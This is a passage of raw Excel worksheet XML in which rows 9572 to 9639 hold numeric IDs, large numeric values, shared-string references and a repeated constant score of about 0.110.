      <c r="E9572" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9572" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9573" ht="15.75" customHeight="1">
      <c r="A9573" s="1">
        <v>3674.0</v>
      </c>
      <c r="B9573" s="2">
        <v>3.9435865E7</v>
      </c>
      <c r="C9573" s="2" t="s">
        <v>9143</v>
      </c>
      <c r="D9573" s="2">
        <v>1.0</v>
      </c>
      <c r="E9573" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9573" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9574" ht="15.75" customHeight="1">
      <c r="A9574" s="1">
        <v>3987.0</v>
      </c>
      <c r="B9574" s="2">
        <v>4.0850041E7</v>
      </c>
      <c r="C9574" s="2" t="s">
        <v>9144</v>
      </c>
      <c r="D9574" s="2">
        <v>1.0</v>
      </c>
      <c r="E9574" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9574" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9575" ht="15.75" customHeight="1">
      <c r="A9575" s="1">
        <v>4018.0</v>
      </c>
      <c r="B9575" s="2">
        <v>4.094925E7</v>
      </c>
      <c r="C9575" s="2" t="s">
        <v>9145</v>
      </c>
      <c r="D9575" s="2">
        <v>1.0</v>
      </c>
      <c r="E9575" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9575" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9576" ht="15.75" customHeight="1">
      <c r="A9576" s="1">
        <v>4174.0</v>
      </c>
      <c r="B9576" s="2">
        <v>4.1553239E7</v>
      </c>
      <c r="C9576" s="2" t="s">
        <v>9146</v>
      </c>
      <c r="D9576" s="2">
        <v>1.0</v>
      </c>
      <c r="E9576" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9576" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9577" ht="15.75" customHeight="1">
      <c r="A9577" s="1">
        <v>4200.0</v>
      </c>
      <c r="B9577" s="2">
        <v>4.1644088E7</v>
      </c>
      <c r="C9577" s="2" t="s">
        <v>9147</v>
      </c>
      <c r="D9577" s="2">
        <v>1.0</v>
      </c>
      <c r="E9577" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9577" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9578" ht="15.75" customHeight="1">
      <c r="A9578" s="1">
        <v>4309.0</v>
      </c>
      <c r="B9578" s="2">
        <v>4.1978167E7</v>
      </c>
      <c r="C9578" s="2" t="s">
        <v>9148</v>
      </c>
      <c r="D9578" s="2">
        <v>1.0</v>
      </c>
      <c r="E9578" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9578" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9579" ht="15.75" customHeight="1">
      <c r="A9579" s="1">
        <v>4573.0</v>
      </c>
      <c r="B9579" s="2">
        <v>4.2763923E7</v>
      </c>
      <c r="C9579" s="2" t="s">
        <v>9149</v>
      </c>
      <c r="D9579" s="2">
        <v>1.0</v>
      </c>
      <c r="E9579" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9579" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9580" ht="15.75" customHeight="1">
      <c r="A9580" s="1">
        <v>4672.0</v>
      </c>
      <c r="B9580" s="2">
        <v>4.3146956E7</v>
      </c>
      <c r="C9580" s="2" t="s">
        <v>9150</v>
      </c>
      <c r="D9580" s="2">
        <v>1.0</v>
      </c>
      <c r="E9580" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9580" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9581" ht="15.75" customHeight="1">
      <c r="A9581" s="1">
        <v>4807.0</v>
      </c>
      <c r="B9581" s="2">
        <v>4.3553511E7</v>
      </c>
      <c r="C9581" s="2" t="s">
        <v>9151</v>
      </c>
      <c r="D9581" s="2">
        <v>1.0</v>
      </c>
      <c r="E9581" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9581" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9582" ht="15.75" customHeight="1">
      <c r="A9582" s="1">
        <v>4970.0</v>
      </c>
      <c r="B9582" s="2">
        <v>4.4098797E7</v>
      </c>
      <c r="C9582" s="2" t="s">
        <v>9152</v>
      </c>
      <c r="D9582" s="2">
        <v>1.0</v>
      </c>
      <c r="E9582" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9582" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9583" ht="15.75" customHeight="1">
      <c r="A9583" s="1">
        <v>5241.0</v>
      </c>
      <c r="B9583" s="2">
        <v>4.5041725E7</v>
      </c>
      <c r="C9583" s="2" t="s">
        <v>9153</v>
      </c>
      <c r="D9583" s="2">
        <v>1.0</v>
      </c>
      <c r="E9583" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9583" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9584" ht="15.75" customHeight="1">
      <c r="A9584" s="1">
        <v>5870.0</v>
      </c>
      <c r="B9584" s="2">
        <v>4.7014243E7</v>
      </c>
      <c r="C9584" s="2" t="s">
        <v>9154</v>
      </c>
      <c r="D9584" s="2">
        <v>1.0</v>
      </c>
      <c r="E9584" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9584" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9585" ht="15.75" customHeight="1">
      <c r="A9585" s="1">
        <v>6696.0</v>
      </c>
      <c r="B9585" s="2">
        <v>4.919733E7</v>
      </c>
      <c r="C9585" s="2" t="s">
        <v>9155</v>
      </c>
      <c r="D9585" s="2">
        <v>1.0</v>
      </c>
      <c r="E9585" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9585" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9586" ht="15.75" customHeight="1">
      <c r="A9586" s="1">
        <v>7453.0</v>
      </c>
      <c r="B9586" s="2">
        <v>5.1235362E7</v>
      </c>
      <c r="C9586" s="2" t="s">
        <v>9156</v>
      </c>
      <c r="D9586" s="2">
        <v>1.0</v>
      </c>
      <c r="E9586" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9586" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9587" ht="15.75" customHeight="1">
      <c r="A9587" s="1">
        <v>7696.0</v>
      </c>
      <c r="B9587" s="2">
        <v>5.1956929E7</v>
      </c>
      <c r="C9587" s="2" t="s">
        <v>9157</v>
      </c>
      <c r="D9587" s="2">
        <v>1.0</v>
      </c>
      <c r="E9587" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9587" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9588" ht="15.75" customHeight="1">
      <c r="A9588" s="1">
        <v>7755.0</v>
      </c>
      <c r="B9588" s="2">
        <v>5.2087E7</v>
      </c>
      <c r="C9588" s="2" t="s">
        <v>9158</v>
      </c>
      <c r="D9588" s="2">
        <v>1.0</v>
      </c>
      <c r="E9588" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9588" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9589" ht="15.75" customHeight="1">
      <c r="A9589" s="1">
        <v>7874.0</v>
      </c>
      <c r="B9589" s="2">
        <v>5.2410303E7</v>
      </c>
      <c r="C9589" s="2" t="s">
        <v>9159</v>
      </c>
      <c r="D9589" s="2">
        <v>1.0</v>
      </c>
      <c r="E9589" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9589" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9590" ht="15.75" customHeight="1">
      <c r="A9590" s="1">
        <v>7961.0</v>
      </c>
      <c r="B9590" s="2">
        <v>5.2678458E7</v>
      </c>
      <c r="C9590" s="2" t="s">
        <v>9160</v>
      </c>
      <c r="D9590" s="2">
        <v>1.0</v>
      </c>
      <c r="E9590" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9590" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9591" ht="15.75" customHeight="1">
      <c r="A9591" s="1">
        <v>8062.0</v>
      </c>
      <c r="B9591" s="2">
        <v>5.2925111E7</v>
      </c>
      <c r="C9591" s="2" t="s">
        <v>9161</v>
      </c>
      <c r="D9591" s="2">
        <v>1.0</v>
      </c>
      <c r="E9591" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9591" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9592" ht="15.75" customHeight="1">
      <c r="A9592" s="1">
        <v>8069.0</v>
      </c>
      <c r="B9592" s="2">
        <v>5.2949424E7</v>
      </c>
      <c r="C9592" s="2" t="s">
        <v>9162</v>
      </c>
      <c r="D9592" s="2">
        <v>1.0</v>
      </c>
      <c r="E9592" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9592" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9593" ht="15.75" customHeight="1">
      <c r="A9593" s="1">
        <v>8083.0</v>
      </c>
      <c r="B9593" s="2">
        <v>5.3035142E7</v>
      </c>
      <c r="C9593" s="2" t="s">
        <v>9163</v>
      </c>
      <c r="D9593" s="2">
        <v>1.0</v>
      </c>
      <c r="E9593" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9593" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9594" ht="15.75" customHeight="1">
      <c r="A9594" s="1">
        <v>8306.0</v>
      </c>
      <c r="B9594" s="2">
        <v>5.359654E7</v>
      </c>
      <c r="C9594" s="2" t="s">
        <v>9164</v>
      </c>
      <c r="D9594" s="2">
        <v>1.0</v>
      </c>
      <c r="E9594" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9594" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9595" ht="15.75" customHeight="1">
      <c r="A9595" s="1">
        <v>8356.0</v>
      </c>
      <c r="B9595" s="2">
        <v>5.375795E7</v>
      </c>
      <c r="C9595" s="2" t="s">
        <v>9165</v>
      </c>
      <c r="D9595" s="2">
        <v>1.0</v>
      </c>
      <c r="E9595" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9595" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9596" ht="15.75" customHeight="1">
      <c r="A9596" s="1">
        <v>8467.0</v>
      </c>
      <c r="B9596" s="2">
        <v>5.4011026E7</v>
      </c>
      <c r="C9596" s="2" t="s">
        <v>9166</v>
      </c>
      <c r="D9596" s="2">
        <v>1.0</v>
      </c>
      <c r="E9596" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9596" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9597" ht="15.75" customHeight="1">
      <c r="A9597" s="1">
        <v>8945.0</v>
      </c>
      <c r="B9597" s="2">
        <v>5.4905328E7</v>
      </c>
      <c r="C9597" s="2" t="s">
        <v>9167</v>
      </c>
      <c r="D9597" s="2">
        <v>1.0</v>
      </c>
      <c r="E9597" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9597" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9598" ht="15.75" customHeight="1">
      <c r="A9598" s="1">
        <v>9053.0</v>
      </c>
      <c r="B9598" s="2">
        <v>5.5091101E7</v>
      </c>
      <c r="C9598" s="2" t="s">
        <v>9168</v>
      </c>
      <c r="D9598" s="2">
        <v>1.0</v>
      </c>
      <c r="E9598" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9598" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9599" ht="15.75" customHeight="1">
      <c r="A9599" s="1">
        <v>9936.0</v>
      </c>
      <c r="B9599" s="2">
        <v>5.6848371E7</v>
      </c>
      <c r="C9599" s="2" t="s">
        <v>9169</v>
      </c>
      <c r="D9599" s="2">
        <v>1.0</v>
      </c>
      <c r="E9599" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9599" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9600" ht="15.75" customHeight="1">
      <c r="A9600" s="1">
        <v>9965.0</v>
      </c>
      <c r="B9600" s="2">
        <v>5.693741E7</v>
      </c>
      <c r="C9600" s="2" t="s">
        <v>9170</v>
      </c>
      <c r="D9600" s="2">
        <v>1.0</v>
      </c>
      <c r="E9600" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9600" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9601" ht="15.75" customHeight="1">
      <c r="A9601" s="1">
        <v>10141.0</v>
      </c>
      <c r="B9601" s="2">
        <v>5.7305907E7</v>
      </c>
      <c r="C9601" s="2" t="s">
        <v>9171</v>
      </c>
      <c r="D9601" s="2">
        <v>1.0</v>
      </c>
      <c r="E9601" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9601" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9602" ht="15.75" customHeight="1">
      <c r="A9602" s="1">
        <v>11059.0</v>
      </c>
      <c r="B9602" s="2">
        <v>1.8251327E7</v>
      </c>
      <c r="C9602" s="2" t="s">
        <v>9172</v>
      </c>
      <c r="D9602" s="2">
        <v>1.0</v>
      </c>
      <c r="E9602" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9602" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9603" ht="15.75" customHeight="1">
      <c r="A9603" s="1">
        <v>11068.0</v>
      </c>
      <c r="B9603" s="2">
        <v>1.8270568E7</v>
      </c>
      <c r="C9603" s="2" t="s">
        <v>9173</v>
      </c>
      <c r="D9603" s="2">
        <v>1.0</v>
      </c>
      <c r="E9603" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9603" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9604" ht="15.75" customHeight="1">
      <c r="A9604" s="1">
        <v>12029.0</v>
      </c>
      <c r="B9604" s="2">
        <v>2.6222072E7</v>
      </c>
      <c r="C9604" s="2" t="s">
        <v>9174</v>
      </c>
      <c r="D9604" s="2">
        <v>1.0</v>
      </c>
      <c r="E9604" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9604" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9605" ht="15.75" customHeight="1">
      <c r="A9605" s="1">
        <v>12227.0</v>
      </c>
      <c r="B9605" s="2">
        <v>2.7775959E7</v>
      </c>
      <c r="C9605" s="2" t="s">
        <v>9175</v>
      </c>
      <c r="D9605" s="2">
        <v>1.0</v>
      </c>
      <c r="E9605" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9605" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9606" ht="15.75" customHeight="1">
      <c r="A9606" s="1">
        <v>12589.0</v>
      </c>
      <c r="B9606" s="2">
        <v>3.0056961E7</v>
      </c>
      <c r="C9606" s="2" t="s">
        <v>9176</v>
      </c>
      <c r="D9606" s="2">
        <v>1.0</v>
      </c>
      <c r="E9606" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9606" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9607" ht="15.75" customHeight="1">
      <c r="A9607" s="1">
        <v>12595.0</v>
      </c>
      <c r="B9607" s="2">
        <v>3.0073341E7</v>
      </c>
      <c r="C9607" s="2" t="s">
        <v>9177</v>
      </c>
      <c r="D9607" s="2">
        <v>1.0</v>
      </c>
      <c r="E9607" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9607" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9608" ht="15.75" customHeight="1">
      <c r="A9608" s="1">
        <v>12789.0</v>
      </c>
      <c r="B9608" s="2">
        <v>3.1365208E7</v>
      </c>
      <c r="C9608" s="2" t="s">
        <v>9178</v>
      </c>
      <c r="D9608" s="2">
        <v>1.0</v>
      </c>
      <c r="E9608" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9608" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9609" ht="15.75" customHeight="1">
      <c r="A9609" s="1">
        <v>12948.0</v>
      </c>
      <c r="B9609" s="2">
        <v>3.2384188E7</v>
      </c>
      <c r="C9609" s="2" t="s">
        <v>9179</v>
      </c>
      <c r="D9609" s="2">
        <v>1.0</v>
      </c>
      <c r="E9609" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9609" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9610" ht="15.75" customHeight="1">
      <c r="A9610" s="1">
        <v>13125.0</v>
      </c>
      <c r="B9610" s="2">
        <v>3.3641067E7</v>
      </c>
      <c r="C9610" s="2" t="s">
        <v>9180</v>
      </c>
      <c r="D9610" s="2">
        <v>1.0</v>
      </c>
      <c r="E9610" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9610" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9611" ht="15.75" customHeight="1">
      <c r="A9611" s="1">
        <v>13139.0</v>
      </c>
      <c r="B9611" s="2">
        <v>3.3724997E7</v>
      </c>
      <c r="C9611" s="2" t="s">
        <v>9181</v>
      </c>
      <c r="D9611" s="2">
        <v>1.0</v>
      </c>
      <c r="E9611" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9611" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9612" ht="15.75" customHeight="1">
      <c r="A9612" s="1">
        <v>13140.0</v>
      </c>
      <c r="B9612" s="2">
        <v>3.3726005E7</v>
      </c>
      <c r="C9612" s="2" t="s">
        <v>9182</v>
      </c>
      <c r="D9612" s="2">
        <v>1.0</v>
      </c>
      <c r="E9612" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9612" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9613" ht="15.75" customHeight="1">
      <c r="A9613" s="1">
        <v>13204.0</v>
      </c>
      <c r="B9613" s="2">
        <v>3.4137953E7</v>
      </c>
      <c r="C9613" s="2" t="s">
        <v>9183</v>
      </c>
      <c r="D9613" s="2">
        <v>1.0</v>
      </c>
      <c r="E9613" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9613" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9614" ht="15.75" customHeight="1">
      <c r="A9614" s="1">
        <v>13567.0</v>
      </c>
      <c r="B9614" s="2">
        <v>3.5699829E7</v>
      </c>
      <c r="C9614" s="2" t="s">
        <v>9184</v>
      </c>
      <c r="D9614" s="2">
        <v>1.0</v>
      </c>
      <c r="E9614" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9614" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9615" ht="15.75" customHeight="1">
      <c r="A9615" s="1">
        <v>14080.0</v>
      </c>
      <c r="B9615" s="2">
        <v>3.7683153E7</v>
      </c>
      <c r="C9615" s="2" t="s">
        <v>9185</v>
      </c>
      <c r="D9615" s="2">
        <v>1.0</v>
      </c>
      <c r="E9615" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9615" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9616" ht="15.75" customHeight="1">
      <c r="A9616" s="1">
        <v>14413.0</v>
      </c>
      <c r="B9616" s="2">
        <v>3.9232754E7</v>
      </c>
      <c r="C9616" s="2" t="s">
        <v>9186</v>
      </c>
      <c r="D9616" s="2">
        <v>1.0</v>
      </c>
      <c r="E9616" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9616" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9617" ht="15.75" customHeight="1">
      <c r="A9617" s="1">
        <v>14602.0</v>
      </c>
      <c r="B9617" s="2">
        <v>4.0240314E7</v>
      </c>
      <c r="C9617" s="2" t="s">
        <v>9187</v>
      </c>
      <c r="D9617" s="2">
        <v>1.0</v>
      </c>
      <c r="E9617" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9617" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9618" ht="15.75" customHeight="1">
      <c r="A9618" s="1">
        <v>14965.0</v>
      </c>
      <c r="B9618" s="2">
        <v>4.1338247E7</v>
      </c>
      <c r="C9618" s="2" t="s">
        <v>9188</v>
      </c>
      <c r="D9618" s="2">
        <v>1.0</v>
      </c>
      <c r="E9618" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9618" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9619" ht="15.75" customHeight="1">
      <c r="A9619" s="1">
        <v>15004.0</v>
      </c>
      <c r="B9619" s="2">
        <v>4.1466355E7</v>
      </c>
      <c r="C9619" s="2" t="s">
        <v>9189</v>
      </c>
      <c r="D9619" s="2">
        <v>1.0</v>
      </c>
      <c r="E9619" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9619" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9620" ht="15.75" customHeight="1">
      <c r="A9620" s="1">
        <v>15026.0</v>
      </c>
      <c r="B9620" s="2">
        <v>4.1552211E7</v>
      </c>
      <c r="C9620" s="2" t="s">
        <v>9190</v>
      </c>
      <c r="D9620" s="2">
        <v>1.0</v>
      </c>
      <c r="E9620" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9620" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9621" ht="15.75" customHeight="1">
      <c r="A9621" s="1">
        <v>15077.0</v>
      </c>
      <c r="B9621" s="2">
        <v>4.1736075E7</v>
      </c>
      <c r="C9621" s="2" t="s">
        <v>9191</v>
      </c>
      <c r="D9621" s="2">
        <v>1.0</v>
      </c>
      <c r="E9621" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9621" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9622" ht="15.75" customHeight="1">
      <c r="A9622" s="1">
        <v>15295.0</v>
      </c>
      <c r="B9622" s="2">
        <v>4.2424914E7</v>
      </c>
      <c r="C9622" s="2" t="s">
        <v>9192</v>
      </c>
      <c r="D9622" s="2">
        <v>1.0</v>
      </c>
      <c r="E9622" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9622" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9623" ht="15.75" customHeight="1">
      <c r="A9623" s="1">
        <v>15321.0</v>
      </c>
      <c r="B9623" s="2">
        <v>4.2514169E7</v>
      </c>
      <c r="C9623" s="2" t="s">
        <v>9193</v>
      </c>
      <c r="D9623" s="2">
        <v>1.0</v>
      </c>
      <c r="E9623" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9623" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9624" ht="15.75" customHeight="1">
      <c r="A9624" s="1">
        <v>15489.0</v>
      </c>
      <c r="B9624" s="2">
        <v>4.3195773E7</v>
      </c>
      <c r="C9624" s="2" t="s">
        <v>9194</v>
      </c>
      <c r="D9624" s="2">
        <v>1.0</v>
      </c>
      <c r="E9624" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9624" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9625" ht="15.75" customHeight="1">
      <c r="A9625" s="1">
        <v>15593.0</v>
      </c>
      <c r="B9625" s="2">
        <v>4.3459797E7</v>
      </c>
      <c r="C9625" s="2" t="s">
        <v>9195</v>
      </c>
      <c r="D9625" s="2">
        <v>1.0</v>
      </c>
      <c r="E9625" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9625" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9626" ht="15.75" customHeight="1">
      <c r="A9626" s="1">
        <v>15707.0</v>
      </c>
      <c r="B9626" s="2">
        <v>4.3958721E7</v>
      </c>
      <c r="C9626" s="2" t="s">
        <v>9196</v>
      </c>
      <c r="D9626" s="2">
        <v>1.0</v>
      </c>
      <c r="E9626" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9626" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9627" ht="15.75" customHeight="1">
      <c r="A9627" s="1">
        <v>16094.0</v>
      </c>
      <c r="B9627" s="2">
        <v>4.5386812E7</v>
      </c>
      <c r="C9627" s="2" t="s">
        <v>9197</v>
      </c>
      <c r="D9627" s="2">
        <v>1.0</v>
      </c>
      <c r="E9627" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9627" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9628" ht="15.75" customHeight="1">
      <c r="A9628" s="1">
        <v>16101.0</v>
      </c>
      <c r="B9628" s="2">
        <v>4.5398161E7</v>
      </c>
      <c r="C9628" s="2" t="s">
        <v>9198</v>
      </c>
      <c r="D9628" s="2">
        <v>1.0</v>
      </c>
      <c r="E9628" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9628" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9629" ht="15.75" customHeight="1">
      <c r="A9629" s="1">
        <v>16424.0</v>
      </c>
      <c r="B9629" s="2">
        <v>4.6316935E7</v>
      </c>
      <c r="C9629" s="2" t="s">
        <v>9199</v>
      </c>
      <c r="D9629" s="2">
        <v>1.0</v>
      </c>
      <c r="E9629" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9629" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9630" ht="15.75" customHeight="1">
      <c r="A9630" s="1">
        <v>16561.0</v>
      </c>
      <c r="B9630" s="2">
        <v>4.6861405E7</v>
      </c>
      <c r="C9630" s="2" t="s">
        <v>9200</v>
      </c>
      <c r="D9630" s="2">
        <v>1.0</v>
      </c>
      <c r="E9630" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9630" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9631" ht="15.75" customHeight="1">
      <c r="A9631" s="1">
        <v>16695.0</v>
      </c>
      <c r="B9631" s="2">
        <v>4.7378726E7</v>
      </c>
      <c r="C9631" s="2" t="s">
        <v>9201</v>
      </c>
      <c r="D9631" s="2">
        <v>1.0</v>
      </c>
      <c r="E9631" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9631" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9632" ht="15.75" customHeight="1">
      <c r="A9632" s="1">
        <v>17070.0</v>
      </c>
      <c r="B9632" s="2">
        <v>4.8588173E7</v>
      </c>
      <c r="C9632" s="2" t="s">
        <v>9202</v>
      </c>
      <c r="D9632" s="2">
        <v>1.0</v>
      </c>
      <c r="E9632" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9632" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9633" ht="15.75" customHeight="1">
      <c r="A9633" s="1">
        <v>17619.0</v>
      </c>
      <c r="B9633" s="2">
        <v>5.0364665E7</v>
      </c>
      <c r="C9633" s="2" t="s">
        <v>9203</v>
      </c>
      <c r="D9633" s="2">
        <v>1.0</v>
      </c>
      <c r="E9633" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9633" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9634" ht="15.75" customHeight="1">
      <c r="A9634" s="1">
        <v>17730.0</v>
      </c>
      <c r="B9634" s="2">
        <v>5.0669493E7</v>
      </c>
      <c r="C9634" s="2" t="s">
        <v>9204</v>
      </c>
      <c r="D9634" s="2">
        <v>1.0</v>
      </c>
      <c r="E9634" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9634" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9635" ht="15.75" customHeight="1">
      <c r="A9635" s="1">
        <v>17776.0</v>
      </c>
      <c r="B9635" s="2">
        <v>5.0770952E7</v>
      </c>
      <c r="C9635" s="2" t="s">
        <v>9205</v>
      </c>
      <c r="D9635" s="2">
        <v>1.0</v>
      </c>
      <c r="E9635" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9635" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9636" ht="15.75" customHeight="1">
      <c r="A9636" s="1">
        <v>18162.0</v>
      </c>
      <c r="B9636" s="2">
        <v>5.1913066E7</v>
      </c>
      <c r="C9636" s="2" t="s">
        <v>9206</v>
      </c>
      <c r="D9636" s="2">
        <v>1.0</v>
      </c>
      <c r="E9636" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9636" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9637" ht="15.75" customHeight="1">
      <c r="A9637" s="1">
        <v>18829.0</v>
      </c>
      <c r="B9637" s="2">
        <v>5.393919E7</v>
      </c>
      <c r="C9637" s="2" t="s">
        <v>9207</v>
      </c>
      <c r="D9637" s="2">
        <v>1.0</v>
      </c>
      <c r="E9637" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9637" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9638" ht="15.75" customHeight="1">
      <c r="A9638" s="1">
        <v>18898.0</v>
      </c>
      <c r="B9638" s="2">
        <v>5.4152293E7</v>
      </c>
      <c r="C9638" s="2" t="s">
        <v>9208</v>
      </c>
      <c r="D9638" s="2">
        <v>1.0</v>
      </c>
      <c r="E9638" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F9638" s="2">
        <v>0.1101190476190476</v>
      </c>
    </row>
    <row r="9639" ht="15.75" customHeight="1">
      <c r="A9639" s="1">
        <v>19241.0</v>
      </c>
      <c r="B9639" s="2">
        <v>5.5078792E7</v>
      </c>
      <c r="C9639" s="2" t="s">
        <v>9209</v>
      </c>
      <c r="D9639" s="2">
        <v>1.0</v>
